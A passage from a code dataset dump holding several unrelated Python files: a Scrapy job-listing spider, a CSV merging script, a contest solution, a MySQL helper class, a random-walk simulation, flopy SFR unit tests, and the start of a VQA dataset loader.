import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin, urlparse\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, ConvertDateString, HtmlFormatter\n\n\nclass JobCenter24h(ATSSpider):\n\n name = \"jobcenter24h\"\n Ref_Num = compile(r\"stellenangebote=(\\S+)&\")\n Location = compile(r\"(\\d+)(\\S+)\")\n Location_another = compile(r\"(\\d+)(\\S+, \\S+)\")\n logo_url = ''\n\n def parse(self, response):\n selector = Selector(response)\n\n if not self.expected_job_count_set:\n expected_count = selector.xpath(\n '//div[@id=\"jssStellenangeboteAnzahlAnzeige\"]/text()'\n ).extract()\n if expected_count:\n self.expected_job_count = expected_count\n\n if not self.logo_url:\n logo_url = selector.xpath(\n '//div[@id=\"jssLogo\"]/a/img/@src |'\n '//div[@id=\"logo\"]/a/img/@src'\n ).extract()\n if logo_url:\n self.logo_url = urljoin(response.url, logo_url[0])\n\n jobs = selector.xpath('//div[contains(@class, \"jssStellenangeboteBewerberList\")]')\n for job in jobs:\n url = job.xpath('./a/@href').extract()\n if url:\n yield Request(\n callback=self.parse_job_callback(),\n meta={\n 'title': job.xpath('./a/text()').extract(),\n 'details': job.xpath('./span[@class=\"jssStellenangeboteListContentFirstLine\"]/text()').extract()\n },\n url=url[0]\n )\n\n next_page_url = selector.xpath('//a[contains(text(), \">>\")]/@href').extract()\n if next_page_url:\n yield Request(\n callback=self.parse,\n url=urljoin(response.url, next_page_url[0])\n )\n\n def parse_job(self, response):\n selector = Selector(response)\n description_xpaths = [\n '//div[@id=\"detail_82\"]/div/div[@class=\"sa_txt\"]',\n '//div[@id=\"contentWrapper\"]/div[@id=\"content\"]/div[@id=\"content-text\"]',\n '//div[@id=\"jssStellenangebotContent\"][not(descendant-or-self::a)][not(descendant-or-self::img)]',\n '//h1/following-sibling::node()[not(descendant-or-self::a)][not(descendant-or-self::img)]',\n '//div[@class=\"texte\"]/div[@class=\"aufgaben\"]/..',\n '//tr/td/p[@id=\"headline\"]/..',\n ]\n loader = BrightcorpItemLoader(selector=selector)\n\n details = response.meta.get('details')\n if details:\n splitted_details = ''.join(details).split('aktualisiert:')\n if splitted_details:\n loader.add_value('date', splitted_details[-1], ConvertDateString('%d.%m.%Y'))\n\n loc = self.Location_another.search(''.join(splitted_details[0]))\n if not loc:\n loc = self.Location.search(''.join(splitted_details[0]))\n if loc:\n loader.add_value('location', loc.group(2))\n loader.add_value('zip_code', loc.group(1))\n\n for description_xpath in description_xpaths:\n loader.add_xpath(\n 'description', description_xpath, HtmlFormatter()\n )\n if loader.get_output_value('description'):\n break\n loader.add_value('apply_url', response.url)\n loader.add_value(\n 'referencenumber',\n response.url,\n Prefix('%s-' % urlparse(response.url).netloc),\n re=self.Ref_Num\n )\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('url', response.url)\n loader.add_value('logo_url', self.logo_url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/jobcenter24h.py","file_name":"jobcenter24h.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"517708849","text":"import pandas as pd\nimport csv\n\nhour_filename = 'LPPH.csv'\nperson_filename = 'LPPP.csv'\nsource_filename = 'Data.csv'\n\ndef merge_csv(file1, file2, file3):\n dfH = pd.read_csv(file1, sep=\",\", header=0)\n dfP = pd.read_csv(file2, sep=\",\", header=0)\n dfS = pd.read_csv(file3, sep=\",\", header=0)\n dfS_Lpph_unit = dfS[(dfS['NA_ITEM'] == \"Nominal labour productivity per hour worked\") & (dfS['UNIT'] == \"Index, 2020=100\")]\n dfS_Lppp_unit = dfS[(dfS['NA_ITEM'] == \"Nominal labour productivity per person\") & (dfS['UNIT'] == \"Index, 2020=100\")]\n merge(dfH, dfS_Lpph_unit, dfS, file3)\n merge(dfP, dfS_Lppp_unit, dfS, file3)\n\ndef merge(dfFrom, dfData, dfTo, fileTo):\n for index in list(dfData.index):\n year = dfData.at[index, 'TIME']\n geo = dfData.at[index, 'GEO']\n if year > 2018:\n break\n else:\n picked_row = dfFrom[(dfFrom['geo-time'] == geo) & (dfFrom[str(year)])]\n id = int(list(picked_row.index)[0])\n new_data = picked_row.at[id, str(year)]\n print(index, \" \", year, \" \", geo, \" \", new_data)\n dfTo.at[index, 'Value'] = new_data\n\n dfTo.to_csv(fileTo, index=False, quotechar='\"', quoting=csv.QUOTE_ALL)\n\n\ndef main():\n merge_csv(hour_filename, person_filename, source_filename)\n\nif __name__ == \"__main__\":\n main()","sub_path":"Merge_Data.py","file_name":"Merge_Data.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"232734300","text":"S = list(input())\n\nblue = S.count('1')\nred = len(S) - blue\n\nn = min(blue,red)\n\nprint(n * 2)\n'''\ncnt = 0\nwhile True:\n if(S == []):\n break\n for i in range(len(S)-1):\n if(S[i] == '0' and S[i+1] == '1') or (S[i] == '1' and S[i+1] == '0'):\n S = S[:i] + S[i+2:]\n cnt += 2\n break\n else:\n break\nprint(cnt)\n'''\n","sub_path":"ABC120/C/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"589236270","text":"\"\"\"\n9-12. Множественные модули: сохраните класс User в одном модуле, а классы Privileges\nи Admin в другом модуле. В отдельном файле создайте экземпляр Admin и вызовите метод\nshow_privileges(), чтобы показать, что все работает правильно.\n\"\"\"\nfrom admin_privileges import Admin\n\nadm = Admin('Ivan', 'Ivanov', 'admin@mail.ru', 'admin')\nprint('Привилегии', end=\": \")\nadm.describe_user()\nadm.privileges.show_privileges()\n","sub_path":"Мэтиз: Изучаем Python/class/user/9-12.py","file_name":"9-12.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"610977649","text":"#encoding:utf-8\n\nimport MySQLdb\nimport logging\n\n\"\"\"\n 数据库管理类\n 1.需要定时调用onTimer来保持连接\n 2.查询用select,其他用querry\n\"\"\"\n\nclass DBManager(object):\n m_ip = ''\n m_port = 0\n m_user = ''\n m_pwd = ''\n m_datatable = ''\n m_charset = ''\n\n dbConn = None\n isConnected = False\n reNowCount = 0 #距离上次ping的时间\n reConnTime = 60 # 60秒自动连接一次db\n\n def init(self, ip,port,user=\"root\",pwd=\"123456\",database=\"py_test\",charset=\"utf8\"):\n try:\n self.m_ip = ip\n self.m_port = port\n self.m_user = user\n self.m_pwd = pwd\n self.m_datatable = database\n self.m_charset = charset\n logging.info(\"ip=%s,port=%d,user=%s,pwd=%s,database=%s,charset=%s\" % (self.m_ip, self.m_port, self.m_user, self.m_pwd, self.m_datatable, self.m_charset))\n self.dbConn = MySQLdb.Connect(host = self.m_ip,\n port = self.m_port,\n user = self.m_user,\n passwd = self.m_pwd,\n db = self.m_datatable,\n charset = self.m_charset)\n self.isConnected = True\n return True\n except BaseException as e:\n raise\n ## def init(self, ip, port, user, passwd, datatable):\n\n def mPing(self):\n if not self.dbConn or not self.isConnected:\n try:\n self.dbConn = MySQLdb.Connect(host=self.m_ip,\n port=self.m_port,\n user=self.m_user,\n passwd=self.m_pwd,\n db=self.m_datatable,\n charset='utf8')\n self.isConnected = True\n except BaseException as e:\n logging.exception(e)\n self.isConnected = False\n return\n # noinspection PyBroadException\n try:\n self.dbConn.ping()\n except:\n self.dbConn.ping(True)\n ## def mPing(self):\n\n def onTimer(self):\n self.reNowCount += 1\n if self.reNowCount % self.reConnTime == 0:\n self.mPing()\n self.reNowCount = 0\n ## def onTimer(self):\n\n def select(self, sqlstr = ''):\n if not self.isConnected:\n logging.error(\"db is not connected\")\n return False, 0, []\n try:\n tmpCursor = self.dbConn.cursor()\n row = tmpCursor.execute(sqlstr)\n self.dbConn.commit()\n result = tmpCursor.fetchall()\n tmpCursor.close()\n return True, row, result\n except BaseException as e:\n logging.exception(e)\n tmpCursor.close()\n return False, 0, []\n ## def select(self, sqlstr = ''):\n\n def querry(self, sqlstr = ''):\n if not self.isConnected:\n logging.error(\"db is not connected\")\n return False, 0, []\n try:\n tmpCursor = self.dbConn.cursor()\n row = tmpCursor.execute(sqlstr)\n self.dbConn.commit()\n result = tmpCursor.fetchall()\n tmpCursor.close()\n return True, row, result\n except BaseException as e:\n self.dbConn.rollback()\n tmpCursor.close()\n logging.exception(e)\n return False, 0, []\n ## def querry(self, sqlstr = ''):\n\ngDBManager = DBManager()","sub_path":"base/DBManager.py","file_name":"DBManager.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"595822422","text":"'''Module to demonstrate a random walk of 500 sailors on an island, which is\r\na circle of radius 10m, with step size of 1m and equal probably of stepping\r\nin any direction. Calculates and returns the mean number of steps sailors\r\nmake until they fall into water as well as the time until 90% of the sailors\r\nfall into the water when walking at a speed of 1 step per minute.'''\r\n\r\nfrom __future__ import division\r\n\r\nimport random\r\nimport numpy as np\r\n\r\ndef sailors():\r\n '''Function which demonstrates a random walk of 500 sailors on an island, which is\r\na circle of radius 10m, with step size of 1m and equal probably of stepping\r\nin any direction. Calculates and returns the mean number of steps sailors\r\nmake until they fall into water as well as the time until 90% of the sailors\r\nfall into the water when walking at a speed of 1 step per minute.'''\r\n nsailors = 500\r\n nsteps = []\r\n\r\n for i in range(nsailors):\r\n steps = 0\r\n xpos, ypos = 0, 0\r\n radius = np.sqrt(xpos**2 + ypos**2)\r\n while radius <= 10:\r\n prob = random.random()\r\n if prob <= 0.25:\r\n xpos += 1\r\n elif prob <= 0.5:\r\n ypos += 1\r\n elif prob <= 0.75:\r\n xpos -= 1\r\n else:\r\n ypos -= 1\r\n radius = np.sqrt(xpos**2 + ypos**2)\r\n steps += 1\r\n nsteps.append(steps)\r\n\r\n mean = 0\r\n for i in nsteps:\r\n mean += i\r\n mean /= nsailors\r\n\r\n nsteps.sort()\r\n time = nsteps[449]\r\n\r\n return (mean, time)\r\n","sub_path":"Computational Physics/q17u1306340.py","file_name":"q17u1306340.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"222967314","text":"__author__ = 'aleaf'\n\nimport sys\nsys.path.append('/Users/aleaf/Documents/GitHub/flopy3')\nimport os\nimport glob\nimport shutil\nimport numpy as np\nfrom flopy.utils.recarray_utils import create_empty_recarray\n\ntry:\n import matplotlib\n # if os.getenv('TRAVIS'): # are we running https://travis-ci.org/ automated tests ?\n # matplotlib.use('Agg') # Force matplotlib not to use any Xwindows backend\nexcept:\n matplotlib = None\n\nimport flopy\nfm = flopy.modflow\nfrom flopy.utils.sfroutputfile import SfrFile\nfrom flopy.discretization import StructuredGrid\nfrom flopy.utils.reference import SpatialReference\n\nif os.path.split(os.getcwd())[-1] == 'flopy3':\n path = os.path.join('examples', 'data', 'mf2005_test')\n path2 = os.path.join('examples', 'data', 'sfr_test')\n outpath = os.path.join('py.test/temp')\nelse:\n path = os.path.join('..', 'examples', 'data', 'mf2005_test')\n path2 = os.path.join('..', 'examples', 'data', 'sfr_test')\n outpath = os.path.join('temp', 't009')\n # make the directory if it does not exist\n if not os.path.isdir(outpath):\n os.makedirs(outpath)\n\nsfr_items = {0: {'mfnam': 'test1ss.nam',\n 'sfrfile': 'test1ss.sfr'},\n 1: {'mfnam': 'test1tr.nam',\n 'sfrfile': 'test1tr.sfr'},\n 2: {'mfnam': 'testsfr2_tab.nam',\n 'sfrfile': 'testsfr2_tab_ICALC1.sfr'},\n 3: {'mfnam': 'testsfr2_tab.nam',\n 'sfrfile': 'testsfr2_tab_ICALC2.sfr'},\n 4: {'mfnam': 'testsfr2.nam',\n 'sfrfile': 'testsfr2.sfr'},\n 5: {'mfnam': 'UZFtest2.nam',\n 'sfrfile': 'UZFtest2.sfr'},\n 6: {'mfnam': 'TL2009.nam',\n 'sfrfile': 'TL2009.sfr'}\n }\n\ndef create_sfr_data():\n dtype = np.dtype([('k', int),\n ('i', int),\n ('j', int),\n ('iseg', int),\n ('ireach', int)])\n r = create_empty_recarray(27, dtype=dtype)\n r['i'] = [3, 4, 5,\n 7, 8, 9,\n 0, 1, 2,\n 4, 4, 5,\n 0, 0, 0,\n 3, 4, 5,\n 0, 1, 2,\n 4, 5, 6,\n 2, 2, 2]\n r['j'] = [0, 1, 2,\n 6, 6, 6,\n 6, 6, 6,\n 3, 4, 5,\n 9, 8, 7,\n 6, 6, 6,\n 0, 0, 0,\n 6, 6, 6,\n 9, 8, 7]\n r['iseg'] = sorted(list(range(1, 10)) * 3)\n r['ireach'] = [1, 2, 3] * 9\n\n d = create_empty_recarray(9, dtype=np.dtype([('nseg', int), ('outseg', int)]))\n d['nseg'] = range(1, 10)\n d['outseg'] = [4, 0, 6, 8, 3, 8, 1, 2, 8]\n return r, d\n\ndef sfr_process(mfnam, sfrfile, model_ws, outfolder=outpath):\n m = flopy.modflow.Modflow.load(mfnam, model_ws=model_ws, verbose=False)\n sfr = m.get_package('SFR')\n\n if not os.path.exists(outfolder):\n os.makedirs(outfolder)\n outpath = os.path.join(outfolder, sfrfile)\n sfr.write_file(outpath)\n\n m.remove_package('SFR')\n sfr2 = flopy.modflow.ModflowSfr2.load(outpath, m)\n\n assert np.all(sfr2.reach_data == sfr.reach_data)\n assert np.all(sfr2.dataset_5 == sfr.dataset_5)\n for k, v in sfr2.segment_data.items():\n assert np.all(v == sfr.segment_data[k])\n for k, v in sfr2.channel_flow_data.items():\n assert np.all(v == sfr.channel_flow_data[k])\n for k, v in sfr2.channel_geometry_data.items():\n assert np.all(v == sfr.channel_geometry_data[k])\n\n return m, sfr\n\n\ndef load_sfr_only(sfrfile):\n m = flopy.modflow.Modflow()\n sfr = flopy.modflow.ModflowSfr2.load(sfrfile, m)\n return m, sfr\n\n\ndef load_all_sfr_only(path):\n for i, item in sfr_items.items():\n load_sfr_only(os.path.join(path, item['sfrfile']))\n\n\ndef interpolate_to_reaches(sfr):\n reach_data = sfr.reach_data\n segment_data = sfr.segment_data[0]\n for reachvar, segvars in {'strtop': ('elevup', 'elevdn'),\n 'strthick': ('thickm1', 'thickm2'),\n 'strhc1': ('hcond1', 'hcond2')}.items():\n reach_data[reachvar] = sfr._interpolate_to_reaches(*segvars)\n for seg in segment_data.nseg:\n reaches = reach_data[reach_data.iseg == seg]\n dist = np.cumsum(reaches.rchlen) - 0.5 * reaches.rchlen\n fp = [segment_data[segment_data['nseg'] == seg][segvars[0]][0],\n segment_data[segment_data['nseg'] == seg][segvars[1]][0]]\n xp = [dist[0], dist[-1]]\n assert np.sum(np.abs(\n reaches[reachvar] - np.interp(dist, xp, fp).tolist())) < 0.01\n return reach_data\n\n\ndef test_sfr():\n load_all_sfr_only(path2)\n\n m, sfr = sfr_process('test1ss.nam', 'test1ss.sfr', path)\n\n m, sfr = sfr_process('test1tr.nam', 'test1tr.sfr', path)\n\n # assert list(sfr.dataset_5.keys()) == [0, 1]\n\n m, sfr = sfr_process('testsfr2_tab.nam', 'testsfr2_tab_ICALC1.sfr', path)\n\n assert list(sfr.dataset_5.keys()) == list(range(0, 50))\n\n m, sfr = sfr_process('testsfr2_tab.nam', 'testsfr2_tab_ICALC2.sfr', path)\n\n assert sfr.channel_geometry_data[0][1] == [\n [0.0, 2.0, 4.0, 6.0, 8.0, 10.0, 12.0, 14.0],\n [6.0, 4.5, 3.5, 0.0, 0.3, 3.5, 4.5, 6.0]]\n\n m, sfr = sfr_process('testsfr2.nam', 'testsfr2.sfr', path)\n\n assert round(sum(sfr.segment_data[49][0]), 7) == 3.9700007\n\n m, sfr = sfr_process('UZFtest2.nam', 'UZFtest2.sfr', path)\n\n if matplotlib is not None:\n assert isinstance(sfr.plot()[0],\n matplotlib.axes.Axes) # test the plot() method\n\n # trout lake example (only sfr file is included)\n # can add tests for sfr connection with lak package\n m, sfr = load_sfr_only(os.path.join(path2, 'TL2009.sfr'))\n # convert sfr package to reach input\n sfr.reachinput = True\n sfr.isfropt = 1\n sfr.reach_data = interpolate_to_reaches(sfr)\n sfr.get_slopes(minimum_slope=-100, maximum_slope=100)\n reach_inds = 29\n outreach = sfr.reach_data.outreach[reach_inds]\n out_inds = np.where(sfr.reach_data.reachID == outreach)\n assert sfr.reach_data.slope[reach_inds] == (sfr.reach_data.strtop[reach_inds] -\n sfr.reach_data.strtop[out_inds]) \\\n / sfr.reach_data.rchlen[reach_inds]\n chk = sfr.check()\n assert sfr.reach_data.slope.min() < 0.0001 and 'minimum slope' in chk.warnings\n sfr.reach_data.slope[0] = 1.1\n chk.slope(maximum_slope=1.0)\n assert 'maximum slope' in chk.warnings\n\n\ndef test_sfr_renumbering():\n # test segment renumbering\n\n dtype = np.dtype([('iseg', int), ('ireach', int)])\n r = create_empty_recarray(27, dtype)\n r['iseg'] = sorted(list(range(1, 10)) * 3)\n r['ireach'] = [1, 2, 3] * 9\n\n dtype = np.dtype([('nseg', int), ('outseg', int)])\n d = create_empty_recarray(9, dtype)\n d['nseg'] = range(1, 10)\n d['outseg'] = [4, 0, 6, 8, 3, 8, 1, 2, 8]\n m = flopy.modflow.Modflow()\n sfr = flopy.modflow.ModflowSfr2(m, reach_data=r, segment_data={0: d})\n chk = sfr.check()\n assert 'segment numbering order' in chk.warnings\n sfr.renumber_segments()\n chk = sfr.check()\n assert 'continuity in segment and reach numbering' in chk.passed\n assert 'segment numbering order' in chk.passed\n\n # test renumbering non-consecutive segment numbers\n r['iseg'] *= 2\n r['ireach'] = [1, 2, 3] * 9\n\n dtype = np.dtype([('nseg', int), ('outseg', int)])\n d = create_empty_recarray(9, dtype)\n d['nseg'] = np.arange(1, 10) * 2\n d['outseg'] = np.array([4, 0, 6, 8, 3, 8, 1, 2, 8]) * 2\n m = flopy.modflow.Modflow()\n sfr = flopy.modflow.ModflowSfr2(m, reach_data=r, segment_data={0: d})\n chk = sfr.check()\n assert 'segment numbering order' in chk.warnings\n sfr.renumber_segments()\n chk = sfr.check()\n assert 'continuity in segment and reach numbering' in chk.passed\n assert 'segment numbering order' in chk.passed\n\n # test computing of outreaches\n assert np.array_equal(sfr.reach_data.outreach,\n np.array([2, 3, 7,\n 5, 6, 10,\n 8, 9, 16,\n 11, 12, 19,\n 14, 15, 22,\n 17, 18, 22,\n 20, 21, 22,\n 23, 24, 25,\n 26, 27, 0]))\n # test slope\n sfr.reach_data['rchlen'] = [10] * 3 * 5 + [100] * 2 * 3 + [1] * 2 * 3\n strtop = np.zeros(len(sfr.reach_data))\n strtop[2] = .3\n strtop[21] = -.2\n strtop[22] = -.4\n sfr.reach_data['strtop'] = strtop\n default_slope = .0001\n sfr.get_slopes(default_slope=default_slope)\n sl1 = sfr.reach_data.slope[2]\n def isequal(v1, v2):\n return np.abs(v1-v2) < 1e-6\n assert isequal(sfr.reach_data.slope[2], 0.03)\n assert isequal(sfr.reach_data.slope[14], 0.02)\n assert isequal(sfr.reach_data.slope[20], sfr.reach_data.slope[17])\n assert isequal(sfr.reach_data.slope[21], 0.2)\n assert isequal(sfr.reach_data.slope[-1], default_slope)\n\ndef test_const():\n\n fm = flopy.modflow\n m = fm.Modflow()\n dis = fm.ModflowDis(m, 1, 10, 10, lenuni=2, itmuni=4)\n m.modelgrid = StructuredGrid(delc=dis.delc.array,\n delr=dis.delr.array,)\n r, d = create_sfr_data()\n sfr = flopy.modflow.ModflowSfr2(m, reach_data=r, segment_data={0: d})\n assert sfr.const == 86400.\n m.dis.itmuni = 1.\n m.sfr.const = None\n assert sfr.const == 1.\n m.dis.lenuni = 1.\n m.sfr.const = None\n assert sfr.const == 1.486\n m.dis.itmuni = 4.\n m.sfr.const = None\n assert sfr.const == 1.486 * 86400.\n assert True\n\ndef test_export():\n fm = flopy.modflow\n m = fm.Modflow()\n dis = fm.ModflowDis(m, 1, 10, 10, lenuni=2, itmuni=4)\n sr = SpatialReference(xul=0.0, yul=0.0, delc=m.dis.delc.array)\n m.modelgrid = StructuredGrid(delc=m.dis.delc.array,\n delr=m.dis.delr.array,\n xoff=sr.xll, yoff=sr.yll)\n # m.sr.origin_loc = \"ll\"\n m.export(os.path.join(outpath, 'grid.shp'))\n r, d = create_sfr_data()\n sfr = flopy.modflow.ModflowSfr2(m, reach_data=r, segment_data={0: d})\n sfr.segment_data[0]['flow'][-1] = 1e4\n sfr.stress_period_data.export(os.path.join(outpath, 'sfr.shp'), sparse=True)\n sfr.export_linkages(os.path.join(outpath, 'linkages.shp'))\n sfr.export_outlets(os.path.join(outpath, 'outlets.shp'))\n sfr.export_transient_variable(os.path.join(outpath, 'inlets.shp'),\n 'flow')\n\n from flopy.export.shapefile_utils import shp2recarray\n ra = shp2recarray(os.path.join(outpath, 'inlets.shp'))\n assert ra.flow0[0] == 1e4\n ra = shp2recarray(os.path.join(outpath, 'outlets.shp'))\n assert ra.iseg[0] + ra.ireach[0] == 5\n ra = shp2recarray(os.path.join(outpath, 'linkages.shp'))\n crds = np.array(list(ra.geometry[2].coords))\n assert np.array_equal(crds, np.array([[2.5, 4.5], [3.5, 5.5]]))\n ra = shp2recarray(os.path.join(outpath, 'sfr.shp'))\n assert ra.iseg0.sum() == sfr.reach_data.iseg.sum()\n assert ra.ireach0.sum() == sfr.reach_data.ireach.sum()\n y = np.concatenate([np.array(g.exterior)[:, 1] for g in ra.geometry])\n x = np.concatenate([np.array(g.exterior)[:, 0] for g in ra.geometry])\n\n assert (x.min(), x.max(), y.min(), y.max()) == m.modelgrid.extent\n assert ra[(ra.iseg0 == 2) & (ra.ireach0 == 1)]['geometry'][0].bounds \\\n == (6.0, 2.0, 7.0, 3.0)\n\ndef test_example():\n m = flopy.modflow.Modflow.load('test1ss.nam', version='mf2005',\n exe_name='mf2005',\n model_ws=path,\n load_only=['ghb', 'evt', 'rch', 'dis',\n 'bas6', 'oc', 'sip', 'lpf'])\n reach_data = np.genfromtxt(\n '../examples/data/sfr_examples/test1ss_reach_data.csv', delimiter=',',\n names=True)\n segment_data = np.genfromtxt(\n '../examples/data/sfr_examples/test1ss_segment_data.csv',\n delimiter=',', names=True)\n # segment_data = {0: ss_segment_data}\n\n channel_flow_data = {\n 0: {1: [[0.5, 1.0, 2.0, 4.0, 7.0, 10.0, 20.0, 30.0, 50.0, 75.0, 100.0],\n [0.25, 0.4, 0.55, 0.7, 0.8, 0.9, 1.1, 1.25, 1.4, 1.7, 2.6],\n [3.0, 3.5, 4.2, 5.3, 7.0, 8.5, 12.0, 14.0, 17.0, 20.0, 22.0]]}}\n channel_geometry_data = {\n 0: {7: [[0.0, 10.0, 80.0, 100.0, 150.0, 170.0, 240.0, 250.0],\n [20.0, 13.0, 10.0, 2.0, 0.0, 10.0, 13.0, 20.0]],\n 8: [[0.0, 10.0, 80.0, 100.0, 150.0, 170.0, 240.0, 250.0],\n [25.0, 17.0, 13.0, 4.0, 0.0, 10.0, 16.0, 20.0]]}}\n\n nstrm = len(reach_data) # number of reaches\n nss = len(segment_data) # number of segments\n nsfrpar = 0 # number of parameters (not supported)\n nparseg = 0\n const = 1.486 # constant for manning's equation, units of cfs\n dleak = 0.0001 # closure tolerance for stream stage computation\n ipakcb = 53 # flag for writing SFR output to cell-by-cell budget (on unit 53)\n istcb2 = 81 # flag for writing SFR output to text file\n dataset_5 = {0: [nss, 0, 0]} # dataset 5 (see online guide)\n\n sfr = flopy.modflow.ModflowSfr2(m, nstrm=nstrm, nss=nss, const=const,\n dleak=dleak, ipakcb=ipakcb, istcb2=istcb2,\n reach_data=reach_data,\n segment_data=segment_data,\n channel_geometry_data=channel_geometry_data,\n channel_flow_data=channel_flow_data,\n dataset_5=dataset_5)\n\n #assert istcb2 in m.package_units\n assert istcb2 in m.output_units\n assert True\n\n # test handling of a 0-D array (produced by genfromtxt sometimes)\n segment_data = np.array(segment_data[0])\n reach_data = reach_data[reach_data['iseg'] == 1]\n nss = 1\n sfr = flopy.modflow.ModflowSfr2(m, nstrm=nstrm, nss=nss, const=const,\n dleak=dleak, ipakcb=ipakcb, istcb2=istcb2,\n reach_data=reach_data,\n segment_data=segment_data,\n channel_geometry_data=channel_geometry_data,\n channel_flow_data=channel_flow_data,\n dataset_5=dataset_5)\n\n # test default construction of dataset_5\n sfr2 = flopy.modflow.ModflowSfr2(m, nstrm=nstrm, nss=nss, const=const,\n dleak=dleak, ipakcb=ipakcb, istcb2=istcb2,\n reach_data=reach_data,\n segment_data=segment_data,\n channel_geometry_data=channel_geometry_data,\n channel_flow_data=channel_flow_data)\n assert len(sfr2.dataset_5) == 1\n assert sfr2.dataset_5[0][0] == sfr2.nss\n nper = 9\n m.dis.nper = nper\n assert len(sfr2.dataset_5) == nper\n for i in range(1, nper):\n assert sfr2.dataset_5[i][0] == -1\n\ndef test_ds_6d_6e_disordered():\n path = os.path.join(\"..\", \"examples\", \"data\", \"hydmod_test\")\n path2 = os.path.join(\".\", \"temp\", \"t009\")\n m = flopy.modflow.Modflow.load(\"test1tr2.nam\",\n model_ws=path)\n\n m.change_model_ws(path2)\n m.write_input()\n\n m2 = flopy.modflow.Modflow.load(\"test1tr2.nam\",\n model_ws=path2)\n\n sfr = m.get_package(\"SFR\")\n sfr2 = m2.get_package(\"SFR\")\n\n\n if len(sfr.all_segments) != len(sfr2.all_segments):\n raise AssertionError\n\n if len(sfr.segment_data[0]) != len(sfr2.segment_data[0]):\n raise AssertionError\n\n for kper, d in sfr.channel_flow_data.items():\n for seg, value in d.items():\n if not np.allclose(value, sfr2.channel_flow_data[kper][seg]):\n raise AssertionError\n\n for kper, d in sfr.channel_geometry_data.items():\n for seg, value in d.items():\n if not np.allclose(value, sfr2.channel_geometry_data[kper][seg]):\n raise AssertionError\n\n\ndef test_transient_example():\n path = os.path.join('temp', 't009')\n gpth = os.path.join('..', 'examples', 'data', 'mf2005_test', 'testsfr2.*')\n for f in glob.glob(gpth):\n shutil.copy(f, path)\n mf = flopy.modflow\n m = mf.Modflow.load('testsfr2.nam', model_ws=path)\n\n # test handling of unformatted output file\n m.sfr.istcb2 = -49\n m.set_output_attribute(unit=abs(m.sfr.istcb2), attr={'binflag':True})\n m.write_input()\n m2 = mf.Modflow.load('testsfr2.nam', model_ws=path)\n assert m2.sfr.istcb2 == -49\n assert m2.get_output_attribute(unit=abs(m2.sfr.istcb2), attr='binflag')\n\ndef test_assign_layers():\n m = fm.Modflow()\n m.dis = fm.ModflowDis(nrow=1, ncol=6, nlay=7,\n botm=np.array([[ 50., 49., 42., 27., 6., -33.],\n [ -196., -246., -297., -351., -405., -462.],\n [ -817., -881., -951., -1032., -1141., -1278.],\n [-1305., -1387., -1466., -1546., -1629., -1720.],\n [-2882., -2965., -3032., -3121., -3226., -3341.],\n [-3273., -3368., -3451., -3528., -3598., -3670.],\n [-3962., -4080., -4188., -4292., -4392., -4496.]]),\n model=m)\n reach_data = fm.ModflowSfr2.get_empty_reach_data(5)\n seg_data = {0: fm.ModflowSfr2.get_empty_segment_data(1)}\n seg_data[0]['outseg'] = 0\n reach_data['k'] = 0\n reach_data['i'] = 0\n reach_data['j'] = np.arange(5)\n reach_data['strtop'] = np.array([20, -250, 0., -3000., -4500.])\n reach_data['strthick'] = 1.\n sfr = fm.ModflowSfr2(reach_data=reach_data,\n segment_data=seg_data,\n model=m)\n sfr.assign_layers()\n assert np.array_equal(sfr.reach_data.k, np.array([1, 2, 1, 4, 6]))\n\n l = m.dis.get_layer(0, 0, 0.)\n assert l == 1\n l = m.dis.get_layer(0, [0, 1], 0.)\n assert np.array_equal(l, np.array([1, 1]))\n\n\ndef test_SfrFile():\n sfrout = SfrFile('../examples/data/sfr_examples/sfroutput2.txt')\n # will be None if pandas is not installed\n if sfrout.pd is not None:\n df = sfrout.get_dataframe()\n assert df.layer.values[0] == 1\n assert df.column.values[0] == 169\n assert df.Cond.values[0] == 74510.0\n assert df.col18.values[3] == 1.288E+03\n\n sfrout = SfrFile('../examples/data/sfr_examples/test1tr.flw')\n if sfrout.pd is not None:\n df = sfrout.get_dataframe()\n assert df.col16.values[-1] == 5.502E-02\n assert df.shape == (1080, 20)\n\n\ndef test_sfr_plot():\n #m = flopy.modflow.Modflow.load('test1ss.nam', model_ws=path, verbose=False)\n #sfr = m.get_package('SFR')\n #sfr.plot(key='strtop')\n #plt.show()\n #assert True\n pass\n\nif __name__ == '__main__':\n # test_sfr()\n # test_ds_6d_6e_disordered()\n # test_sfr_renumbering()\n # test_example()\n # test_export()\n #test_transient_example()\n #test_sfr_plot()\n # test_assign_layers()\n # test_SfrFile()\n # test_const()\n pass\n","sub_path":"autotest/t009_test.py","file_name":"t009_test.py","file_ext":"py","file_size_in_byte":19372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"299766062","text":"import os\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torchvision.transforms as transforms\n\nfrom PIL import Image\nfrom six.moves import cPickle as pickle\nfrom torch.utils.data import Dataset\nfrom external.vqa.vqa import VQA\nfrom coatt.dataset import pre_process_dataset\n\ndef pil_loader(path):\n # open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)\n with open(path, 'rb') as f:\n img = Image.open(f)\n img = img.convert('RGB')\n return img\n\n\ndef default_loader(path):\n from torchvision import get_image_backend\n if get_image_backend() == 'accimage':\n return accimage_loader(path)\n else:\n return pil_loader(path)\n\nclass CocoQAXDataset(Dataset):\n def __init__(self,\n image_enc_dir,\n image_names,\n question_id_file,\n answer_text_file,\n 